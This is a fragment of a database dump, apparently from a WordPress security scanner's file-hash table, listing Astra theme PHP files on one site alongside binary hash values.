('wÞŽJùÃÆ)es>Z;J', 'wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class-astra-edd-single-product-layout-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class-astra-edd-single-product-layout-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Nj½-í“[9NÊ|z?IQ¦', '‘ê?h”½J\nm\n#vú£L¹¶Ì‚+ÿ\nqjs;¬', '', 0, '?'),
('¡Ã1ÎfG…ß¸G®x{¸', 'wp-content/themes/astra/inc/compatibility/edd/edd-common-functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/edd-common-functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'š|ê_qc~ß6x,øþ¦[', '*lÇôZ¼´L)X„g‹TY3üã_äì—;ˆ–X{µ', '', 0, '?'),
('§ýÖ^.LMÛê¾', 'wp-content/themes/astra/inc/compatibility/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5Û¢ÚÐò»gp4Ì’/x', 'ÝíPÁ!Ô¨8aKu×•”lï¦Ä•ß —”ª}\rN8', '', 0, '?'),
('0;Ñ=c''\rXâ…–9xü', 'wp-content/themes/astra/inc/compatibility/learndash/class-astra-learndash.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/class-astra-learndash.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~¨»ô6ß930²:@', 'gÏ&™“²gª´{ÔfºMuó''ÇÓE.ì3EÕä¨', '', 0, '?'),
('A÷¼_''·‰ÚXóÔ', 'wp-content/themes/astra/inc/compatibility/learndash/customizer/class-astra-customizer-register-learndash-section.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/customizer/class-astra-customizer-register-learndash-section.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fÎ‡;>÷*šÐµ-¸', '„QhlÌÎ5íß.€[ˆ°¹27-}˜*î’T«í“Õ÷ë', '', 0, '?'),
('$„©ä—œ}&úÕ¤™^´µ', 'wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/class-astra-learndash-container-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/class-astra-learndash-container-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€äLÃ\ZMCNIa²\Z¡—x', 'GÏB(o!µ‚(möôµ ’Ö}	ÞæV¯ô~ÏÁ„\\!', '', 0, '?'),
('°í¯mæ¤èþ\r‡5~·', 'wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/class-astra-learndash-sidebar-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/class-astra-learndash-sidebar-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚æ¤]ñ®ÐÒ²ä¤¾+Y‘', 'd@ÄÌË-§Æ&©ßéuzÉ†žºZ½fßòÒB´\nà)', '', 0, '?'),
('òx%Ð¸šÛ§ç¾Ï³‘Öh', 'wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/layout/class-astra-learndash-general-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/layout/class-astra-learndash-general-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5~BãŽ6<ämgš\0A`', '©ø1ÇR×uÅ7ù+¸³¿øyTqÑ!Ã\\ï‰cÙ', '', 0, '?'),
('Ã?ë/uUe¿{ß@Làž', 'wp-content/themes/astra/inc/compatibility/lifterlms/class-astra-lifterlms.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/class-astra-lifterlms.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢\Z"¸ó¯4×Ë¿¸;', '$ëŠµh½Ö²©uq´YLU¨þ@ó!7Ð[òVF€Õ.', '', 0, '?'),
('Ø.âs€«>îw…Zˆ', 'wp-content/themes/astra/inc/compatibility/lifterlms/customizer/class-astra-liferlms-section-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/customizer/class-astra-liferlms-section-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6ê4À´ b²s¦‘1¬	IC', 'È»“çð<bÂ4Fûù),@.«®E”Ú˜\r×K“WÇ÷ M', '', 0, '?'),
('¦Ií[Ð^“J²|4“] ', 'wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/class-astra-lifter-container-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/class-astra-lifter-container-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9ŒöÓoÅ"x4‰+ÅÄe4õ', 'º‰ÙCÂ}Eð›Æn8Hí{îÉ/½''RÊêAih', '', 0, '?'),
('§\Z¨îÉàˆ¶ƒ}R«\nÃÖ', 'wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/class-astra-lifter-sidebar-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/class-astra-lifter-sidebar-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5±åR€mr8Wè*…', 'NÊá5½íö‹%,uÓä”í5Ú¨<ñn‰\0˜ÞH', '', 0, '?'),
('Š$ëîúÊH%DØ&Ò+', 'wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/layout/class-astra-lifter-general-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/layout/class-astra-lifter-general-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#,S¤[×ë…dØ?ˆº', ')¤Å£L«—§@;X"I¯ò¦.¶0³0ˆóo• H[', '', 0, '?'),
('Ûöž;m\r>°¥õ|"õ', 'wp-content/themes/astra/inc/compatibility/starter-content/astra-settings-export.json', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/starter-content/astra-settings-export.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸«Á Ø§Œ½5l×ìÁFÔ', '\ZkÕQ’‡sH-ƒßøHßûŽ¡GjÞM¹ží£°Fn', '', 0, '?'),
('{_ü	§ìÃóÚ2°±', 'wp-content/themes/astra/inc/compatibility/starter-content/home.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/starter-content/home.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ë¸±úÎšùNÛõ,ÿçõJæ', '>,â€€¨´kÄWÄ½»‚·O±œI]¼¦O$>N™', '', 0, '?'),
('2¯¦ÓU"¿éà]Èö9øð', 'wp-content/themes/astra/inc/compatibility/woocommerce/class-astra-woocommerce.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/class-astra-woocommerce.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢*sûëŽ«¹Šø}w_^{', '@õØ36½fâÍÔ|ÄIþ4O\nÍ…òôò0\r&’', '', 0, '?'),
('ÁV«§BË‚<6Ÿr9Ÿ', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/class-astra-customizer-register-woo-section.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/class-astra-customizer-register-woo-section.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '<\nïžˆ,¾ËöÌ[£Î', 'ä}6ÁâŠC:…+>(\nù—Á~c^.Cã”íx|2ro\n\r', '', 0, '?'),
('Þf™@ˆ\Zë²lÒñ{zlü', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-shop-container-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-shop-container-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',¼ï’l½än±ÿöÁ+ÐO', '4º›ÉÁÛ¿â?¨ËÛ„ˆ‚Mi~C£þÍ¦öç™¶', '', 0, '?'),
('v''#…P&\nþß‰&Oúä', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-shop-sidebar-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-shop-sidebar-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ':Ãn¾‘cq¤J¸¥\ZÚò†', 'Ã¸íŒì”Ò)©aÛujÁz\Zè‡Šaæ‘s*çÍî5', '', 0, '?'),
('~Ü<µT\\)"ö:{ÇÀõ', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-store-notice-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-store-notice-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'šwP/€’‘9“Fë', '„Õì|¦Eµea6-&©»_îBKØˆÏÂ>eº’', '', 0, '?'),
('ÖÒ\Z1?¢‰ì0ü—P', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-cart-layout-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-cart-layout-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'a`1G;r$3ìfäwÍ„', 'X¹J@MÿÍé”‡F_I[ÃÊRïqÏC²ÄC½hbÄ8', '', 0, '?'),
('bF­tU•Ðn*Œc', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-layout-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-layout-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'X‰(Ü„Ç©Šì8wÄp‘“Q', '\r|_Ÿ‡™ [­ÖÓuêÎõ{’ò-*Pž', '', 0, '?'),
('RnX©Ýt…&Æj$~ó÷', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-misc-layout-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-misc-layout-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3%9å$67U–BP>®¸', 'êjÈ?ÆèP(ü°š±!Z&#Î¿•ádãõÀ$·™çn', '', 0, '?'),
('ôl¨û1óv¥I´¹¬ã’ÊØ', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-single-layout-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-single-layout-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŽsOÚ<ÿmÛ£±Yc"@', '}ÂøDQa(ÃË_KïoaåçÌk k+\\„&•4Y¦~', '', 0, '?'),
('ië´© ì•Ûþw3¯¼A', 'wp-content/themes/astra/inc/compatibility/woocommerce/woocommerce-common-functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/woocommerce-common-functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fUFÕ|„¾IRìÐHíHH', 'ñç3}z:ø³Cqe	 çuqáUáNE+**çº~', '', 0, '?'),
('­ííêØÁ…:9 ô', 'wp-content/themes/astra/inc/core/builder/class-astra-builder-admin.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/builder/class-astra-builder-admin.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=I?áI9JZX÷a©ÝŸ.6', '´²DLý4^Qºó§ÅZ¡îÇw7atZÕ	ã»âe\Z†[', '', 0, '?'),
('ìMƒOæ\0ä÷ènkOéÓ', 'wp-content/themes/astra/inc/core/builder/class-astra-builder-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/builder/class-astra-builder-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§s}XÂ®§t¸¡R—E', 'ÙZ5úx‚O„HÉ¸§ž3€B‚³±–˜…°z‚á¿›#', '', 0, '?'),
('¶ç Æ<Ê0î"5’äš', 'wp-content/themes/astra/inc/core/builder/class-astra-builder-options.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/builder/class-astra-builder-options.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­“»y>Äµ)ŒNÚ=Î¸', '¡X4|æYkETX€““XmÉ˜ÝŠ¯c\Z™C2Aw˜þ*', '', 0, '?'),
('J_‡µ|Æ+›bllÖ', 'wp-content/themes/astra/inc/core/class-astra-admin-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-admin-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2—/å}´b	e…ƒ›[h', 'Ñ=—GHÝØ*¼B×‡AÅc0½ý>ÙVpZÝð¼×ÙÿkiÄ', '', 0, '?'),
('»SdÖNTV’–™ÖÞ5', 'wp-content/themes/astra/inc/core/class-astra-admin-settings.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-admin-settings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '<½\r.ÉpB9†<¼[LÞ<', 'šÓÒACmŠYi3Í5ÚnÃ÷9s~GDf Ë\\nÎÌÁïN', '', 0, '?'),
('&+\\ajfôDÛÃ', 'wp-content/themes/astra/inc/core/class-astra-attr.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-attr.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Q““ðö:$£±"‡í•Ï', 'ÞtÃ(³üwM=¦vèhØ)pÃ{­ž„Üu¯oTïÓk¡', '', 0, '?'),
('´\r¬€ÉÔNõª4”"mŽ', 'wp-content/themes/astra/inc/core/class-astra-enqueue-scripts.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-enqueue-scripts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒÕóµhM4x\\µÏDƒ', 'þp#7Ø@ì¬Þ.ÏD]àÊÞŽ;ø7(UvurÆ«Ïq–²', '', 0, '?'),
('\nÎh=O©¸ç-I©’\\Ñé=', 'wp-content/themes/astra/inc/core/class-astra-icons.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-icons.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'äÏ!„Ÿ€•sKSÏX£Æ', '—<$=>ÜçÂ''®$¯g7b³k¼Ä„úÝ‡Òß®liŠ', '', 0, '?'),
('»zCKWö][<î\\dÙ', 'wp-content/themes/astra/inc/core/class-astra-theme-options.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-theme-options.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '4ÞŽÌ¾ÏÊ£LøŸXð', 'm%²Ì ^Nð’;Ô+D-ë×¿3¼…É×#;oåQª	"', '', 0, '?'),
('ãÁ¸˜ó˜…w‚mÔ›]Z', 'wp-content/themes/astra/inc/core/class-astra-walker-page.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-walker-page.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°øJ]h‘Ùï%ö·É“b^­', 'Qâ‚¬.z7:Œ~“úÖ)*žÎ´V‡`L¹Ö–¾“±od', '', 0, '?'),
('«Í¬`á€Èµå5“ÔÔxæ', 'wp-content/themes/astra/inc/core/class-astra-wp-editor-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-wp-editor-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ªø3%ëp5¯ÝÌycÉVk', 'Ê‰ì Ò\nU¢R¾´}ðÔJ¿Œ0Õ“q Y1Œòƒ', '', 0, '?'),
('\r^ÏòÙ5Âq&S­ë', 'wp-content/themes/astra/inc/core/class-gutenberg-editor-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-gutenberg-editor-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'j=¿jƒZ“ªpÍøŸ“+', 'sºcŠ''Ülr¨:Òi7ÌM•nÇE[ßø]Ì9', '', 0, '?'),
('Ó±ŒéWÄØ¯x–\0…¢’', 'wp-content/themes/astra/inc/core/class-theme-strings.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-theme-strings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~–¡ÆÅymæ…Þ~†[', 'Î‘9à~QÍ[û)<ë‹þ;×Ù}~¥5÷\râÄ', '', 0, '?'),
('‹Ô³;jÌÇŸGCÊ«™', 'wp-content/themes/astra/inc/core/common-functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/common-functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ßßQ‰ç''#îªüX±', '·\08²<7\ZÓúaøóî†PW»e{’^ÛÏë', '', 0, '?'),
('+Y"äqiíÅX(Òýžš', 'wp-content/themes/astra/inc/core/deprecated/deprecated-filters.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/deprecated/deprecated-filters.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ð%£)Òü:ž¤8ø&™', '’ÌR¨Æm›¯/øÙbÚÆÌ·FK_Ý<àÛƒÍAX<', '', 0, '?'),
('`Eé—L $‡gû¯+l\ZÕß', 'wp-content/themes/astra/inc/core/deprecated/deprecated-functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/deprecated/deprecated-functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´Òø‘˜3ƒÚ×ªÑ@J§O', '''–•|rÃ¾cîÝ¨¯-KÕO!å)©Th\n•L–<Ë=', '', 0, '?'),
('Œ¯\ZWŽt2”sÍ?mr', 'wp-content/themes/astra/inc/core/deprecated/deprecated-hooks.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/deprecated/deprecated-hooks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ý›Óša1ƒV»Ô¯{\0¥B', 'g“òV¿B4â®¤µõGC^þói„‰	©7O¢QW', '', 0, '?'),
('y¦Å(C®ÉÕ je"dÉÞ', 'wp-content/themes/astra/inc/core/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5Û¢ÚÐò»gp4Ì’/x', 'ÝíPÁ!Ô¨8aKu×•”lï¦Ä•ß —”ª}\rN8', '', 0, '?'),
('vˆ¬¸ p%!ÒµÑ', 'wp-content/themes/astra/inc/core/markup/class-astra-markup.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/markup/class-astra-markup.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ã—ðÿdlQ|±v¬µ', '\rUÞƒø—¶ì&ƒ¶aîåHûšaà{ãjLã‡¶¹', '', 0, '?'),
('…†¿w÷ŒÏN·åY€°', 'wp-content/themes/astra/inc/core/sidebar-manager.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/sidebar-manager.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ïTwßï¦Â™¸ôÝ', 'ÀÙœ‡»)˜Ö½Û’–ôüvKeU ¼±ÆúÌÈÁ', '', 0, '?'),
('îÔÒ¨FâÒ¯G§B§Ùœ', 'wp-content/themes/astra/inc/core/theme-hooks.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/theme-hooks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„6æš…åq8.L¸çÖ¾šÖ', 'ýóh?~MçyB´¾0~´DÌ‹ª¯¦Þº°\r', '', 0, '?'),
('EêâEaa.›dxšílWü', 'wp-content/themes/astra/inc/customizer/astra-pro/class-astra-pro-customizer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/astra-pro/class-astra-pro-customizer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'MÚ4Ï	¨:³¶¤ÍÄÄD', 'ƒ“„[]šZð‰¢¯£ýîsç®é#åš]d|Üu', '', 0, '?'),
('ÉñDÛß¿ÚúŽ÷™5À8', 'wp-content/themes/astra/inc/customizer/astra-pro/class-astra-pro-upgrade-link-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/astra-pro/class-astra-pro-upgrade-link-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'š¼¡”¦}sUhx.Y$', 'ŽxÁi'']\rSŒ’·µûÑw¥À²òr¤¥¯ŽY•™µèâ£', '', 0, '?'),
('%ÉÀZ3²wÝ€fKF™ÆZ', 'wp-content/themes/astra/inc/customizer/astra-pro/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/astra-pro/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5Û¢ÚÐò»gp4Ì’/x', 'ÝíPÁ!Ô¨8aKu×•”lï¦Ä•ß —”ª}\rN8', '', 0, '?'),
('™ILòÚÆ©3Ó‡.½Ah', 'wp-content/themes/astra/inc/customizer/class-astra-builder-customizer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-builder-customizer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '0‘e`a"ÌdN–öØ\nÇ$', 'nR›ë9Mü”ð!áþ‘®á²7Û±—¬ê§¿½M)_‡', '', 0, '?'),
('¯99øi	ˆ¤¾ÇMºµjW', 'wp-content/themes/astra/inc/customizer/class-astra-customizer-callback.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer-callback.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'èå‘\rkC3’TûÏÍIÖÚ', '.­ôKÝµ5?a6÷§¾†~Ù:±\r“=²O–÷7Z/¸À', '', 0, '?'),
('¹ ÎÜÄ¥rQÏ©ß¿¾]ÿ', 'wp-content/themes/astra/inc/customizer/class-astra-customizer-partials.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer-partials.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µï/4µ§(Èüq,$Õ÷', '´¸Ÿª2–è‚Á /€ñ¶8©A8ò¬¤$÷÷`ä«ó', '', 0, '?'),
('MÓ8]ºä^àÒþž_œ¿', 'wp-content/themes/astra/inc/customizer/class-astra-customizer-register-sections-panels.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer-register-sections-panels.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”B¿þ¨FÂ%¬:ëX™9ã', '_µÁ¡h\r¡´\\¾‡.³eyþözƒßIêg*®Hž’', '', 0, '?'),
('¡†ÛÅ´5ÚëŠbnÜê¼', 'wp-content/themes/astra/inc/customizer/class-astra-customizer-sanitizes.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer-sanitizes.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '37+4-™}ËøEP¥õÂ¢_', 'Ÿ¡À$,ŠFð«É\nœ¾ïùÛ´éãb@–ßÛý/V¡c', '', 0, '?'),
('Ûfv6w~LÐË5q!²3', 'wp-content/themes/astra/inc/customizer/class-astra-customizer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\rdMz)y ïYQ˜XÕŽ’&', 'lâ/mëY±js¿•úV”½lÀµ‡°PÆ0î›æS$½T', '', 0, '?'),
('4|ÌBÚÄ„ŸFy€ýÄVá', 'wp-content/themes/astra/inc/customizer/class-astra-extended-base-configuration.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-extended-base-configuration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'TAÅª8ç*[ØS†8 ', '&’u\ZýoÉŠÏB½Ó"lØ$\Z:6FÇ›>Ãf®!Ód>', '', 0, '?'),
('2¯;æâWV4¾BØæè…', 'wp-content/themes/astra/inc/customizer/class-astra-font-families.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-font-families.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '| kÓdú°jíô”4*', 'žýö†D½“q-ÐÕ É¦F¬dî4^±ºFùÌ', '', 0, '?'),
('¡É‘·gìë-³ƒÇ', 'wp-content/themes/astra/inc/customizer/class-astra-fonts-data.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-fonts-data.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‘ÿ—_ƒ]0µ4x\0', '\rë=¦RIUV^¤ûRÜ3¾¤Öó·­íÑÏé¨eéi"', '', 0, '?'),
('éËI&ðL%''¨\\&;b', 'wp-content/themes/astra/inc/customizer/class-astra-fonts.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-fonts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ü>¿BÒDa]Äÿ‘_Zâð', 'ÂÙ6\ZAæ[y»Ýd ÙÀ¨k¼]\\„ª\\tÆd‹Œ˜', '', 0, '?'),
('.Å¥åúð‰ø+rê8Yý', 'wp-content/themes/astra/inc/customizer/configurations/accessibility/class-astra-accessibility-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/accessibility/class-astra-accessibility-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9n9â÷ãŒ0µå­¹ã”æ', '{gá…§”g[JbÛºÒî\0ŸŽºPbÒû ÿ6-”', '', 0, '?'),
('”yjs ÄèR\0ô5ÿç¡', 'wp-content/themes/astra/inc/customizer/configurations/block-editor/class-astra-block-editor-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/block-editor/class-astra-block-editor-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÌjÑÊïH@ÒoV-\0¨¤R3', 'ýç	>Ðoˆë6)-³	¨é®„LyÉ0ŸMq¡ƒšô', '', 0, '?'),
('"ÒÙ«þM-þLîÝ($Ž', 'wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-button-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-button-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+Í¸¯¤nÓ~½80¡rë‚', 'ÏzÈ]õ×tßÁwºŠÕbtëNuÇ„íWŠDhÜ©az', '', 0, '?'),
('€–Jrdw°TRžÀÞ9r', 'wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-html-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-html-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Dq“Å=nÛDá^ytÔ', 'TY0™2lˆ‘Lù©ÛP`Ê	×;Éõ5ï²¿nìüv—Ú½', '', 0, '?'),
(')Oú™uð‰Òu6j[Zó‘', 'wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-social-icon-component-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-social-icon-component-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'é²Ãiff’''ˆMK.·öóì', '™$–7t³_åXÇz{Å¸ÁŽ8‚%0££áþéJ!)', '', 0, '?'),
('z{žVXaŠÒ’ÞšV', 'wp-content/themes/astra/inc/customizer/configurations/builder/class-astra-builder-base-configuration.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/class-astra-builder-base-configuration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷ž][£G§xÏ#]AÈ}', 'Ð‡\r›ÑÙ€½Ó½ŽÄ¯~poÇŠì•ÆUx¾Å''Ç', '', 0, '?'),
